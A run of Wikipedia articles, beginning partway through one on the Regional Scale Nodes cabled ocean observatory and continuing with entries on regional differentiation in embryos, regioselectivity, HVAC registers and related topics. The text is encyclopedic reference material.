By the mid-2000s, NEPTUNE Canada had received full funding and their cabled array was completed and online by 2009. It was brought under the umbrella network of Ocean Networks Canada (ONC). Meanwhile, NEPTUNE U.S. was renamed to Regional Scale Nodes and became a component of the OOI. It is slated for completion in 2014. Both NEPTUNE Canada and RSN will be integrated through the ONC's digital infrastructure and the OOI Cyberinfrastructure providing real-time access to anyone connected to the Internet.
"The goal of the program is to launch an era of scientific discovery and understanding across and within the ocean basins, utilizing widely accessible, interactive telepresence. It's a new world. We will be present throughout the volume of the ocean, at will, communicating in real time...So what can we actually do tomorrow? We're about to ride the wave of technological opportunity. There are emerging technologies throughout the field around oceanography, which we will incorporate into oceanography, and through that convergence, we will transform oceanography into something even more magical."
The scientific goals of RSN are significant. A vast array of natural phenomena that occur throughout the world's oceans and seafloor are found in the Northeast Pacific Ocean. As a whole, the mission of RSN is to provide a human telepresence in the ocean that will serve researchers, students, educators, policymakers, and the public. Scientists will be able to conduct local investigations of such global processes as major ocean currents , active earthquake zones, creation of new seafloor , and rich environments of marine plants and animals .
RSN is also designed to help anticipate both short and long-term ocean-generated threats and opportunities. Notably, RSN will be able to monitor the tectonic activity along the plate boundary . There is hope that seismic sensors could be installed at key areas along the spreading center which would serve as an early warning system for earthquakes and tsunamis .
The existence of a long-term cabled observatory will allow for long-term measurements of biological communities . In particular, the Juan de Fuca plate's divergent plate boundary has resulted in the existence of seafloor hydrothermal vents ecosystems, and other similar groups. These deep sea communities , thriving in extremely harsh environments, pose a number of unsolved scientific questions which RSN will be capable of investigating.
Primary Infrastructure
The primary infrastructure of RSN consists of seven primary nodes which were installed in 2012 by L-3 Maripro . They are terminal points which help distribute power and bandwidth to the networks of deployed sensors.
Approximately 900 kilometers of cable (referred to as backbone cable) have been used to connect the primary nodes together. These cables make landfall at the shore station in Pacific, City, Oregon .
In 2005, over 175 scientists across the United States responded to a Request for Assistance from the National Science Foundation to develop a cabled observatory on the Juan de Fuca Plate. Nodes are located at pre-selected experimental sites throughout the Juan de Fuca plate. Axial Seamount , Hydrate Ridge on the Cascadia Margin and shallow water sites west of Newport, Oregon (the Endurance Array) all have primary nodes installed. The primary nodes are all located in environmentally benign areas.
Nodes also convert the 10kVdc voltage levels from the backbone cable to 375Vdc which is then directed to the secondary infrastructure. The 375V switching systems and Node telemetry systems were designed and manufactured by Texcel Technology Plc based in England. The software to manage the ports and telemetry protection systems was also supplied by Texcel as an element manager sitting under a Network Management System (NMS).
The primary nodes have a number of extra ports which offer the potential for large-scale future expansion (>100 kilometers).
Secondary Infrastructure
The converted 375Vdc voltage from the primary nodes is then directed at low-and medium-power nodes and junction boxes. The nodes and junction boxes (similar to power strips) offer direct power and communications to the instruments at the experimental sites. In concert, these parts make up the RSN secondary infrastructure.
Extension cables are used to link the primary nodes to the secondary infrastructure, providing power and communications.
Equipment is linked using wet-mate connectors. Different types of cable were installed depending on load requirements. Bandwidth from these cables ranges from 10 Gbit/s to 1 Gbit/s.
During the VISIONS ’13 expedition to continue construction of RSN, over 22,000 meters of extension cables were installed on the ocean floor. The cables all successfully went online.
Upon completion in 2014, over 100 cabled seafloor and water column instruments will be operational. These instruments will allow monitoring of biological, chemical, geological, and geophysical processes in the ocean. The secondary infrastructure will also include six mooring systems for water-column profilers.
Cables are frequently deployed all across the world in ocean basins and margins. They have considerably long lifetimes. The backbone cable was installed in the summer of 2011. The commercial cable-laying ship, TE SubCom Dependable , carried out this phase of the project.
Special environmental requirements were also taken into account. Certain cables are substantially well-armored, especially those deployed in volcanic areas, such as Axial Seamount.
In order to fully understand complex ocean systems, a wide variety of sensor arrays, capable of surviving for long periods of time in harsh conditions, are necessary. A suite of sensors (over 100) were selected and strategically placed throughout RSN. They are located at Axial Seamount, Hydrate Ridge, and also on the water-column moorings.
Instruments connected to the RSN include:
The instruments are the final spot of each regional network branch.
The Regional Scale Nodes is connected into the OOI Cyberinfrastructure.
The Cyberinfrastructure component of the OOI links marine infrastructure to scientists and users. The OOI Cyberinfrastructure manages and integrates data from all the different OOI sensors. It will provide a common operating infrastructure, the Integrated Observatory Network (ION), connecting and coordinating the operations of the marine components (global, regional, and coastal scale arrays). It will also provide resource management, observatory mission command and control, product production, data management and distribution (including strong data provenance), and centrally available collaboration tools.
The Integrated Observatory Network (ION) connects and coordinates the operations of the OOI marine components with the scientific and educational pursuits of oceanographic research communities. The cyberinfrastructure is being designed and constructed by the University of California, San Diego .
Construction of RSN is ongoing. As of September 19, 2014, the primary infrastructure and most of the secondary infrastructure was successfully in place, and OOI RSN and UW APL crews were working to complete the vertical moorings for the shallow profiler.
The University of Washington has welcomed student participation in the implementation of RSN. As of 2014, there have been eight expeditions in which students have had the opportunity to work aboard the R/V Thomas G. Thompson and witness the construction of the cabled observatory. During these cruises, students develop projects utilizing the array of technology and scientific equipment on board.
Students who participate in these expeditions go on to share their experiences with others.
In 2014, over 30 graduate and undergraduate students worked alongside the researchers, engineers, educators, and crew during the 83-day VISIONS ’14 expedition. | https://en.wikipedia.org/wiki/Regional_Scale_Nodes |
Regional Science Policy & Practice (RSPP) , since 2019 publish six issues per year, is a peer-reviewed academic journal published by Wiley-Blackwell on behalf of the Regional Science Association International . It was established in 2008 and covers regional science topics from disciplines such as planning, economics , environmental science , geography , and public policy .
This article about an urban planning journal is a stub . You can help Wikipedia by expanding it .
See tips for writing articles about academic journals . Further suggestions might be found on the article's talk page . | https://en.wikipedia.org/wiki/Regional_Science_Policy_and_Practice |
This article lists the main regional associations for road authorities from around the world. Many of these are associated with the World Road Association . | https://en.wikipedia.org/wiki/Regional_associations_of_road_authorities |
In the field of developmental biology , regional differentiation is the process by which different areas are identified in the development of the early embryo . [ 1 ] The process by which the cells become specified differs between organisms .
In terms of developmental commitment, a cell can either be specified or it can be determined. Specification is the first stage in differentiation. [ 2 ] A cell that is specified can have its commitment reversed while the determined state is irreversible. [ 3 ] There are two main types of specification: autonomous and conditional. A cell specified autonomously will develop into a specific fate based upon cytoplasmic determinants with no regard to the environment the cell is in. A cell specified conditionally will develop into a specific fate based upon other surrounding cells or morphogen gradients. Another type of specification is syncytial specification, characteristic of most insect classes. [ 2 ]
Specification in sea urchins uses both autonomous and conditional mechanisms to determine the anterior/posterior axis. The anterior/posterior axis lies along the animal/vegetal axis set up during cleavage . The micromeres induce the nearby tissue to become endoderm while the animal cells are specified to become ectoderm . The animal cells are not determined because the micromeres can induce the animal cells to also take on mesodermal and endodermal fates. It was observed that β-catenin was present in the nuclei at the vegetal pole of the blastula . Through a series of experiments, one study confirmed the role of β-catenin in the cell-autonomous specification of vegetal cell fates and the micromeres inducing ability. [ 4 ] Treatments of lithium chloride sufficient to vegetalize the embryo resulted in increases in nuclearly localized b-catenin. Reduction of expression of β-catenin in the nucleus correlated with loss of vegetal cell fates. Transplants of micromeres lacking nuclear accumulation of β-catenin were unable to induce a second axis.
For the molecular mechanism of β-catenin and the micromeres, it was observed that Notch was present uniformly on the apical surface of the early blastula but was lost in the secondary mesenchyme cells (SMCs) during late blastula and enriched in the presumptive endodermal cells in late blastula. Notch is both necessary and sufficient for determination of the SMCs. The micromeres express the ligand for Notch, Delta, on their surface to induce the formation of SMCs.
The high nuclear levels of b-catenin results from the high accumulation of the disheveled protein at the vegetal pole of the egg. disheveled inactivates GSK-3 and prevents the phosphorylation of β-catenin. This allows β-catenin to escape degradation and enter the nucleus. The only important role of β-catenin is to activate the transcription of the gene Pmar1. This gene represses a repressor to allow micromere genes to be expressed.
The aboral/oral axis (analogous to the dorsal/ventral axes in other animals) is specified by a nodal homolog. This nodal was localized on the future oral side of the embryo. Experiments confirmed that nodal is both necessary and sufficient to promote development of the oral fate. Nodal also has a role in left/right axis formation.
Tunicates have been a popular choice for the study of regional specification because tunicates were the first organism in which autonomous specification was discovered and tunicates are evolutionary related to vertebrates.
Early observations in tunicates led to the identification of the yellow crescent (also called the myoplasm). This cytoplasm was segregated to future muscle cells and if transplanted could induce the formation of muscle cells. The cytoplasmic determinant macho-1 was isolated as the necessary and sufficient factor for muscle cell formation. Similar to Sea urchins, the accumulation of b-catenin in the nuclei was identified as both necessary and sufficient to induce endoderm.
Two more cell fates are determined by conditional specification. The endoderm sends a fibroblast growth factor (FGF) signal to specify the notocord and the mesenchyme fates. Anterior cells respond to FGF to become notocord while posterior cells (identified by the presence of macho-1) respond to FGF to become mesenchyme.
The cytoplasm of the egg not only determines cell fate, but also determines the dorsal/ventral axis. The cytoplasm in the vegetal pole specifies this axis and removing this cytoplasm leads to a loss of axis information. The yellow cytoplasm specifies the anterior/posterior axis. When the yellow cytoplasm moves to the posterior of the egg to become posterior vegetal cytoplasm (PVC), the anterior/posterior axis is specified. Removal of the PVC leads to a loss of the axis while transplantation to the anterior reverses the axis.
In the two cell stage, the embryo of the nematode C. elegans exhibits mosaic behavior . There are two cells, the P1 cell and the AB cell. The P1 cell was able make all of its fated cells while the AB cell could only make a portion of the cells it was fated to produce. Thus, The first division gives the autonomous specification of the two cells, but the AB cells require a conditional mechanism to produce all of its fated cells.
The AB lineage gives rise to neurons, skin, and pharynx. The P1 cell divides into EMS and P2. The EMS cell divides into MS and E. The MS lineage gives rise to pharynx, muscle, and neurons. The E lineage gives rise to intestines. The P2 cell divides into P3 and C founder cells. The C founder cells give rise to muscle, skin, and neurons. The P3 cell divides into P4 and D founder cells. The D founder cells give rise to muscle while the P4 lineage gives rise to the germ line.
The anterior/posterior patterning of Drosophila come from three maternal groups of genes. The anterior group patterns the head and thoracic segments. The posterior group patterns the abdominal segments and the terminal group patterns the anterior and posterior terminal regions called the terminalia (the acron in the anterior and the telson in the posterior).
The anterior group genes include bicoid. Bicoid functions as a graded morphogen transcription factor that localizes to the nucleus. The head of the embryo forms at the point of highest concentration of bicoid and the anterior pattern depends upon the concentration of bicoid. Bicoid works as a transcriptional activator of the gap genes hunchback (hb), buttonhead (btd), empty spiracles (ems), and orthodentical (otd) while also acting to repress translation of caudal. A different affinity for bicoid in the promoters of the genes it activates allows for the concentration dependent activation. Otd has a low affinity for bicoid, hb has a higher affinity and so will be activated at a lower bicoid concentration. Two other anterior group genes, swallow and exuperantia play a role in localizing bicoid to the anterior. Bicoid is directed to the anterior by its 3' untranslated region (3'UTR). The microtubule cytoskeleton also plays a role in localizing bicoid.
The posterior group genes include nanos. Similar to bicoid, nanos is localized to the posterior pole as a graded morphogen. The only role of nanos is to repress the maternally transcribed hunchback mRNA in the posterior. Another protein, pumilio, is required for nanos to repress hunchback. Other posterior proteins, oskar (which tethers nanos mRNA), Tudor, vasa , and Valois, localize the germ line determinants and nanos to the posterior.
In contrast to the anterior and the posterior, the positional information for the terminalia come from the follicle cells of the ovary. The terminalia are specified through the action of the Torso receptor tyrosine kinase. The follicle cells secrete Torso-like into the perivitelline space only at the poles. Torso-like cleaves the pro-peptide Trunk which appears to be the Torso ligand. Trunk activates Torso and causes a signal transduction cascade which represses the transcriptional repressor Groucho which in turn causes the activation of the terminal gap genes tailless and huckebein.
The patterning from the maternal genes work to influence the expression of the segmentation genes . The segmentation genes are embryonically expressed genes that specify the numbers, size and polarity of the segments. The gap genes are directly influenced by the maternal genes and are expressed in local and overlapping regions along the anterior/posterior axis. These genes are influenced by not only the maternal genes, but also by epistatic interactions between the other gap genes.
The gap genes work to activate the pair-rule genes . Each pair-rule gene is expressed in seven stripes as a result of the combined effect of the gap genes and interactions between the other pair-rule genes. The pair-rule genes can be divided into two classes: the primary pair-rule genes and the secondary pair-rule genes. The primary pair-rules genes are able to influence the secondary pair-rule genes but not vice versa. The molecular mechanism between the regulation of the primary pair-rule genes was understood through a complex analysis of the regulation of even-skipped. Both positive and negative regulatory interactions by both maternal and gap genes and a unique combination of transcription factors work to express even-skipped in different parts of the embryo. The same gap gene can act positively in one stripe but negatively in another.
The expression of the pair-rule genes translate into the expression of the segment polarity genes in 14 stripes. The role of the segment polarity genes is to define to boundaries and the polarity of the segments. The means to which the genes accomplish this is believed to involve a wingless and hedgehog graded distribution or cascade of signals initiated by these proteins. Unlike the gap and the pair-rule genes, the segment polarity genes function within cells rather than within the syncytium. Thus, segment polarity genes influence patterning though signaling rather than autonomously. Also, the gap and pair-rule genes are expressed transiently while segment polarity gene expression is maintained throughout development. The continued expression of the segment polarity genes is maintained by a feedback loop involving hedgehog and wingless.
While the segmentation genes can specify the number, size, and polarity of segments, homeotic genes can specify the identity of the segment. The homeotic genes are activated by gap genes and pair-rule genes. The Antennapedia complex and the bithorax complex on the third chromosome contain the major homeotic genes required for specifying segmental identity (actually parasegmental identity). These genes are transcription factors and are expressed in overlapping regions that correlate with their position along the chromosome. These transcription factors regulate other transcription factors, cell surface molecules with roles in cell adhesion, and other cell signals. Later during development, homeotic genes are expressed in the nervous system in a similar anterior/posterior pattern. Homeotic genes are maintained throughout development through the modification of the condensation state of their chromatin. Polycomb genes maintain the chromatin in an inactive conformation while trithorax genes maintain chromatin in an active conformation.
All homeotic genes share a segment of protein with a similar sequence and structure called the homeodomain (the DNA sequence is called the homeobox). This region of the homeotic proteins binds DNA. This domain was found in other developmental regulatory proteins, such as bicoid, as well in other animals including humans. Molecular mapping revealed that the HOX gene cluster has been inherited intact from a common ancestor of flies and mammals which indicates that it is a fundamental developmental regulatory system.
The maternal protein, Dorsal, functions like a graded morphogen to set the ventral side of the embryo (the name comes from mutations which led to a dorsalized phenotype). Dorsal is like bicoid in that it is a nuclear protein; however, unlike bicoid, dorsal is uniformly distributed throughout the embryo. The concentration difference arises from differential nuclear transport. The mechanism by which dorsa l becomes differentially located into the nuclei occurs in three steps.
The first step happens in the dorsal side of the embryo. The nucleus in the oocyte moves along a microtubule track to one side of the oocyte. This side sends a signal, gurken , to the torpedo receptors on the follicle cells. The torpedo receptor is found in all follicle cells; however, the gurken signal is only found on the anterior dorsal side of the oocyte. The follicle cells change shape and synthetic properties to distinguish the dorsal side from the ventral side. These dorsal follicle cells are unable to produce the pipe protein required for step two.
The second step is a signal from the ventral follicle cells back to the oocyte. This signal acts after the egg has left the follicle cells so this signal is stored in the perivitelline space. The follicle cells secrete windbeutel, nudel, and pipe, which create a protease-activating complex. Because the dorsal follicle cells do not express pipe, they are not able to create this complex. Later, the embryo secretes three inactive proteases ( gastrulation defective, snake, and Easter ) and an inactive ligand ( spätzle ) into the perivitelline space. These proteases are activated by the complex and cleave spätzle into an active form. This active protein is distributed in a ventral to dorsal gradient. Toll is a receptor tyrosine kinase for spätzle and transduces the graded spätzle signal through the cytoplasm to phosphorylate cactus . Once phosphorylated, cactus no longer binds to dorsal, leaving it free to enter the nucleus. The amount of released dorsal depends on the amount of spätzle protein present.
The third step is the regional expression of zygotic genes decapentaplegic ( dpp ), zerknüllt , tolloid , twist , snail , and rhomboid due to the expression of dorsal in the nucleus. High levels of dorsal are required to turn on transcription of twist and snail. Low levels of dorsal can activate the transcription of rhomboid. Dorsal represses the transcription of zerknüllt, tolloid, and dpp. The zygotic genes also interact with each other to restrict their domains of expression.
Between fertilization and the first cleavage in Xenopus embryos, the cortical cytoplasm of the zygote rotates relative to the central cytoplasm by about 30 degrees to uncover (in some species) a gray crescent in the marginal or middle region of the embryo. The cortical rotation is powered by microtubules motors moving along parallel arrays of cortical microtubules. This gray crescent marks the future dorsal side of the embryo. Blocking this rotation prevents formation of the dorsal/ventral axis. By the late blastula stage, the Xenopus embryos have a clear dorsal/ventral axis.
In the early gastrula, most of the tissue in the embryo is not determined. The one exception is the anterior portion of the dorsal blastopore lip. When this tissue was transplanted to another part of the embryo, it developed as it normally would. In addition, this tissue was able to induce the formation of another dorsal/ventral axis. Hans Spemann named this region the organizer and the induction of the dorsal axis the primary induction.
The organizer is induced from a dorsal vegetal region called the Nieuwkoop center . There are many different developmental potentials throughout the blastula stage embryos. The vegetal cap can give rise to only endodermal cell types while the animal cap can give rise to only ectodermal cell types. The marginal zone, however, can give rise to most structures in the embryo including mesoderm . A series of experiments by Pieter Nieuwkoop showed that if the marginal zone is removed and the animal and vegetal caps placed next to each other, the mesoderm comes from the animal cap and the dorsal tissues are always adjacent to the dorsal vegetal cells. Thus, this dorsal vegetal region, named the Nieuwkoop center, was able to induce the formation of the organizer.
Twinning assays identified Wnt proteins as molecules from the Nieuwkoop center that could specify the dorsal/ventral axis. In twinning assays, molecules are injected into the ventral blastomere of a four-cell stage embryo. If the molecules specify the dorsal axis, dorsal structures will be formed on the ventral side. Wnt proteins were not necessary to specify the axis, but examination of other proteins in the Wnt pathway led to the discovery that β-catenin was necessary. β-catenin is present in the nuclei on the dorsal side but not on the ventral side. β-catenin levels are regulated by GSK-3. When active, GSK-3 phosphorylates free β-catenin, which is then targeted for degradation. There are two possible molecules that might regulate GSK-3: GBP (GSK-3 Binding Protein) and Dishevelled . The current model is that these act together to inhibit GSK-3 activity. Dishevelled is able to induce a secondary axis when overexpressed and is present at higher levels on the dorsal side after cortical rotation ( Symmetry Breaking and Cortical Rotation ). Depletion of Dishevelled, however, has no effect. GBP has an effect both when depleted and overexpressed. Recent evidence, however, showed that Xwnt11, a Wnt molecule expressed in Xenopus , was both sufficient and necessary for dorsal axis formation. [ 5 ]
Mesoderm formation comes from two signals: one for the ventral portion and one for the dorsal portion. Animal cap assays were used to determine the molecular signals from the vegetal cap that are able to induce the animal cap to form mesoderm. In an animal cap assay, molecules of interest are either applied in medium that the cap is grown in or injected as mRNA in an early embryo. These experiments identified a group of molecules, the transforming growth factor-β (TGF-β) family. With dominant negative forms of TGF-β, early experiments were only able to identify the family of molecules involved not the specific member. Recent experiments have identified the Xenopus nodal-related proteins (Xnr-1, Xnr-2, and Xnr-4) as the mesoderm-inducing signals. Inhibitors of these ligands prevents mesoderm formation and these proteins show a graded distribution along the dorsal/ventral axis.
Vegetally localized mRNA, VegT and possibly Vg1, are involved in inducing the endoderm. It is hypothesized that VegT also activates the Xnr-1,2,4 proteins. VegT acts as a transcription factor to activate genes specifying endodermal fate while Vg1 acts as a paracrine factor.
β-catenin in the nucleus activates two transcription factors: siamois and twin. β-catenin also acts synergistically with VegT to produce high levels of Xnr-1,2,4. Siamois will act synergistically with Xnr-1,2,4 to activate a high level of the transcription factors such as goosecoid in the organizer. Areas in the embryo with lower levels of Xnr-1,2,4 will express ventral or lateral mesoderm. Nuclear β-catenin works synergistically with the mesodermal cell fate signal to create the signaling activity of the Nieuwkoop center to induce the formation of the organizer in the dorsal mesoderm.
There are two classes of genes that are responsible for the organizer's activity: transcription factors and secreted proteins. Goosecoid (which has a homology between bicoid and gooseberry) is the first known gene to be expressed in the organizer and is both sufficient and necessary to specify a secondary axis.
The organizer induces ventral mesoderm to become lateral mesoderm, induces the ectoderm to form neural tissue and induces dorsal structures in the endoderm. The mechanism behind these inductions is an inhibition of the bone morphogenetic protein 4 signaling pathway that ventralizes the embryo. In the absence of these signals, ectoderm reverts to its default state of neural tissue. Four of the secreted molecules from the organizer, chordin, noggin, follistatin and Xenopus nodal-related-3 (Xnr-3), directly interact with BMP-4 and block its ability to bind to its receptor. Thus, these molecules create a gradient of BMP-4 along the dorsal/ventral axis of the mesoderm.
BMP-4 mainly acts in trunk and tail region of the embryo while a different set of signals work in the head region. Xwnt-8 is expressed throughout the ventral and lateral mesoderm. The endomesoderm (can give rise to either endoderm or mesoderm) at the leading edge of the archenteron (future anterior) secrete three factors Cerberus , Dickkopf, and Frzb . While Cerberus and Frzb bind directly to Xwnt-8 to prevent it from binding to its receptor, Cerberus is also capable of binding to BMP-4 and Xnr1. [ 6 ] Furthermore, Dickkopf binds to LRP-5, a transmembrane protein important for the signalling pathway of Xwnt-8, leading to endocytosis of LRP-5 and eventually to an inhibition of the Xwnt-8 pathway.
The anterior/posterior patterning of the embryo occurs sometime before or during gastrulation . The first cells to involute have anterior inducing activity while the last cells have posterior inducing activity. The anterior inducing ability comes from the Xwnt-8 antagonizing signals Cereberus, Dickkopf and Frzb discussed above. Anterior head development also requires the function of IGFs (insulin-like growth factors) expressed in the dorsal midline and the anterior neural tube. It is believed that IGFs function by activating a signal transduction cascade that interferes and inhibits both Wnt signaling and BMP signaling. In the posterior, two candidates for posteriorizing signals include eFGF, a fibroblast growth factor homologue, and retinoic acid .
The basis for axis formation in zebrafish parallels what is known in amphibians. The embryonic shield has the same function as the dorsal lip of the blastopore and acts as the organizer. When transplanted, it is able to organize a secondary axis and removing it prevents the formation of dorsal structures. β-catenin also has a role similar to its role in amphibians. It accumulates in the nucleus only on the dorsal side; ventral β-catenin induces a secondary axis. It activates the expression of Squint (a Nodal related signaling protein aka ndr1) and Bozozok (a homeodomain transcription factor similar to Siamois) which act together to activate goosecoid in the embryonic shield.
As in Xenopus, mesoderm induction involves two signals: one from the vegetal pole to induce ventral mesoderm and one from the Nieuwkoop center equivalent dorsal vegetal cells to induce dorsal mesoderm.
The signals from the organizer also parallel to those from amphibians. Noggin and chordin homologue Chordino, binds to a BMP family member, BMP2B, to block it from ventralizing the embryo. Dickkopf binds to a Wnt homolog Wnt8 to block it from ventralizing and posteriorizing the embryo.
There is a third pathway regulated by β-catenin in fish. β-catenin activates the transcription factor stat3. Stat3 coordinates cell movements during gastrulation and contributes to establishing planar polarity.
The dorsal/ventral axis is defined in chick embryos by the orientation of the cells with respect to the yolk. Ventral is down with respect to the yolk while animal is up. This axis is defined by the creation of a pH difference "inside" and "outside" of the blastoderm between the subgerminal space and the albumin on the outside. The subgerminal space has a pH of 6.5 while the albumin on the outside has a pH of 9.5.
The anterior/posterior axis is defined during the initial tilting of the embryo when the eggshell is being deposited. The egg is constantly being rotated in a consistent direction and there is a partial stratification of the yolk; the lighter yolk components will be near one end of the blastoderm and will become the future posterior. The molecular basis of the posterior is not known, however, the accumulation of cells eventually results in the posterior marginal zone (PMZ).
The PMZ is the equivalent of the Nieuwkoop center is that its role is to induce Hensen's node. Transplantation of the PMZ results in induction of a primitive streak, however, PMZ does not contribute to the streak itself. Similar to the Nieuwkoop center, the PMZ expresses both Vg1 and nuclear localized β-catenin.
The Hensen's node is equivalent to the organizer. Transplantation of Hensen's node results in the formation of a secondary axis. Hensen's node is the site where gastrulation begins and it becomes the dorsal mesoderm. Hensen's node is formed from the induction of PMZ on the anterior part of the PMZ called Koller's sickle . When the primitive streak forms, these cells expand out to become Hensen's node. These cells express goosecoid consistent with their role as the organizer.
The function of the organizer in chick embryos is similar to that of amphibians and fish, however, there are some differences. Similar to the amphibians and fish, the organizer does secrete Chordin, Noggin and Nodal proteins that antagonize BMP signaling and dorsalize the embryo. Neural induction, however, does not rely entirely on inhibiting the BMP signaling. Overexpression of BMP antagonists is not enough induce formation of neurons nor overexpressing BMP block formation of neurons. While the whole story is unknown for neural induction, FGFs seem to play a role in mesoderm and neural induction. The anterior/posterior patterning of the embryo requires signals like cerberus from the hypoblast and the spatial regulation of retinoic acid accumulation to activate the 3' Hox genes in the posterior neuroectoderm (hindbrain and spinal cord).
The earliest specification in mouse embryos occurs between trophoblast and inner cell mass cells in the outer polar cells and the inner apolar cells respectively. These two groups become specified at the eight-cell stage during compaction, but do not become determined until they reach the 64-cell stage. If an apolar cell is transplanted to the outside during the 8-32 cell stage, that cell will develop as a trophoblast cell.
The anterior/posterior axis in the mouse embryo is specified by two signaling centers. In the mouse embryo, the egg forms a cylinder with the epiblast forming a cup at the distal end of that cylinder. The epiblast is surrounded by the visceral endoderm, the equivalent of the hypoblast of humans and chicks. Signals for the anterior/posterior axis come from the primitive node . The other important site is the anterior visceral endoderm (AVE). The AVE lies anterior to the node's most anterior position and lies just under the epiblast in the region that will become occupied by migrating endomesoderm to form head mesoderm and foregut endoderm. The AVE interacts with the node to specify the most anterior structures. Thus, the node is able to form a normal trunk, but requires signals from the AVE to form a head.
The discovery of the homeobox in Drosophila flies and its conservation in other animals has led to advancements in understanding the anterior/posterior patterning. Most of the Hox genes in mammals show an expression pattern that parallels the homeotic genes in flies. In mammals, there are four copies of the Hox genes. Each set of Hox genes are paralogous to the others (Hox1a is a paralogue of Hox1b, etc.) These paralogs show overlapping expression patterns and could act redundantly. However, double mutations in paralogous genes can also act synergistically indicating that the genes must work together for function. | https://en.wikipedia.org/wiki/Regional_differentiation |
Regional geochemistry is the study of the spatial variation in the chemical composition of materials at the surface of the Earth , on a scale of tens to thousands of kilometres. Important parameters to consider when designing or evaluating a geochemical survey are:
Garrett et al. (2008) describe how the discipline has evolved from its beginnings in Russia in the 1930s. The first surveys were aimed at mineral exploration. In recent years, many surveys have emphasised a more broad-based environmental mapping approach. Numerous government agencies around the world have initiated multi-year systematic geochemical mapping projects, aimed at producing baseline geochemical maps of very large areas. See, for example, the description by Johnson et al. (2005) of the British Geological Survey’s G-BASE project.
This geochemistry article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regional_geochemistry |
In organic chemistry , regioselectivity is the preference of chemical bonding or breaking in one direction over all other possible directions. [ 1 ] [ 2 ] It can often apply to which of many possible positions a reagent will affect, such as which proton a strong base will abstract from an organic molecule , or where on a substituted benzene ring a further substituent will be added.
A specific example is a halohydrin formation reaction with 2-propenylbenzene : [ 3 ]
Because of the preference for the formation of one product over another, the reaction is selective. This reaction is regioselective because it selectively generates one constitutional isomer rather than the other.
Various examples of regioselectivity have been formulated as rules for certain classes of compounds under certain conditions, many of which are named. Among the first introduced to chemistry students are Markovnikov's rule for the addition of protic acids to alkenes , and the Fürst-Plattner rule for the addition of nucleophiles to derivatives of cyclohexene , especially epoxide derivatives. [ 4 ] [ 5 ]
Regioselectivity in ring-closure reactions is subject to Baldwin's rules . If there are two or more orientations that can be generated during a reaction, one of them is dominant (e.g., Markovnikov/anti-Markovnikov addition across a double bond )
Regioselectivity can also be applied to specific reactions such as addition to pi ligands .
Selectivity also occurs in carbene insertions , for example in the Baeyer-Villiger reaction. In this reaction, an oxygen is regioselectively inserted near an adjacent carbonyl group. In ketones , this insertion is directed toward the carbon which is more highly substituted (i.e. according to Markovnikov's rule). For example, in a study involving acetophenones , this oxygen was preferentially inserted between the carbonyl and the aromatic ring to give acetyl aromatic esters instead of methyl benzoates . [ 6 ] | https://en.wikipedia.org/wiki/Regioselectivity |
A register is a grille with moving parts, capable of being opened and closed and the air flow directed, which is part of a building's heating, ventilation, and air conditioning (HVAC) system. The placement and size of registers is critical to HVAC efficiency. Register dampers are also important, and can serve a safety function.
A grille is a perforated cover for an air duct (used for heating, cooling, or ventilation, or a combination thereof). Grilles sometimes have louvers which allow the flow of air to be directed. A register differs from a grille in that a damper is included. [ 1 ] [ 2 ] However, in practice, the terms grille , register , and return are often used interchangeably, and care must be taken to determine the meaning of the term used. [ 2 ] [ 3 ]
Placement of registers is key in creating an efficient HVAC system. Usually, a register is placed near a window or door, which is where the greatest heat/cooling loss occurs. [ 4 ] [ 5 ] In contrast, returns (grilled ducts which suck air back into the HVAC system for heating or cooling) are usually placed in the wall or ceiling nearest the center of the building. Generally, in rooms where it is critical to maintain a constant temperature two registers (one placed near the ceiling to deliver cold air, and one placed in the floor to deliver hot air) and two returns (one high, one low) will be used. HVAC systems generally have one register and one return per room. [ 4 ]
Registers vary in size with the heating and cooling requirements of the room. [ 5 ] If a register is too small, the HVAC system will need to push air through the ducts at a faster rate in order to achieve the desired heating or cooling. This can create rushing sounds which can disturb occupants or interfere with conversation or work (such as sound recording). The velocity of air through a register is usually kept low enough so that it is masked by background noise. (Higher ambient levels of background noise, such as those in restaurants, allow higher air velocities.) On the other hand, air velocity must be high enough to achieve the desired temperature. [ 6 ] Registers are a critical part of the HVAC system. If not properly installed and tightly connected to the ductwork, air will spill around the register and greatly reduce the HVAC system's efficiency. [ 5 ] Ideally, a room will have both heating and cooling registers. In practice, cost considerations usually require that heating and cooling be provided by the same register. In such cases, heating most often takes precedence over cooling, and registers are usually found close to the floor. [ 7 ]
For heating purposes, a floor register is preferred. This is because hot air rises, and as it cools it falls. This creates good air circulation in a room, and helps to maintain a more even temperature as hot and cold air is mixed more thoroughly. [ 3 ] Floor registers generally have a grille strong enough for a human being to walk on without damaging the grille. It is rare to find a floor register installed less than 6 inches (15 cm) from the corner of a room. [ 8 ] When a floor register is not practical or desired, a wall register is used. The correct placement of wall heating registers is critical. Generally, the heating register will be directly across from an exterior window. The hot air from the register will mix with the cold air coming off the window, cool, and drop to the floor—creating good air circulation. However, the hot air must be pushed from the register with enough force (or "throw") so that it will cross the room and reach the window. If there is too little throw, the hot air will stop moving partway across the room, the cold air from the window will not be heated (creating the feeling of a cool draft), and air circulation will suffer. [ 9 ]
A register's damper provides a critical function. Primarily, the damper allows the amount of hot or cool air entering a room to be controlled, providing for more accurate control over room temperature. [ 7 ] Dampers also allow air to be shut off in unused rooms, improving the efficiency of the HVAC system. Dampers can also help adjust a HVAC system for seasonal use. [ 7 ] During winter months, for example, an air conditioning register can be closed to prevent cold air from being pulled from the room. This allows the hot air to mix more completely with the cold air in the room, improving the efficiency of the HVAC system. [ 7 ] (The return should be efficient enough to draw off the cooler air.) [ 10 ] [ 11 ]
Some registers, particularly those in commercial buildings or institutions which house large numbers of people (such as hotels or hospitals) have a fire damper attached to them. This damper automatically senses smoke or extreme heat, and shuts the register closed so that fire and smoke do not travel throughout the building via the HVAC system. [ 12 ] | https://en.wikipedia.org/wiki/Register_(air_and_heating) |
The Register of Antarctic Marine Species , also known as RAMS , is a taxonomic database that provides a list of marine species found in the Southern Ocean surrounding Antarctica . [ 1 ] [ 2 ]
Its purpose is to provide authoritative and comprehensive information on the diversity of marine life in the region, which provides a reference point for marine science, research, conservation and sustainable management. [ 3 ] The database includes marine species found on the sea floor, in the water column, and around sea-ice. [ 4 ] RAMS is a regionally-focused database within the World Register of Marine Species . [ 1 ] | https://en.wikipedia.org/wiki/Register_of_Antarctic_Marine_Species |
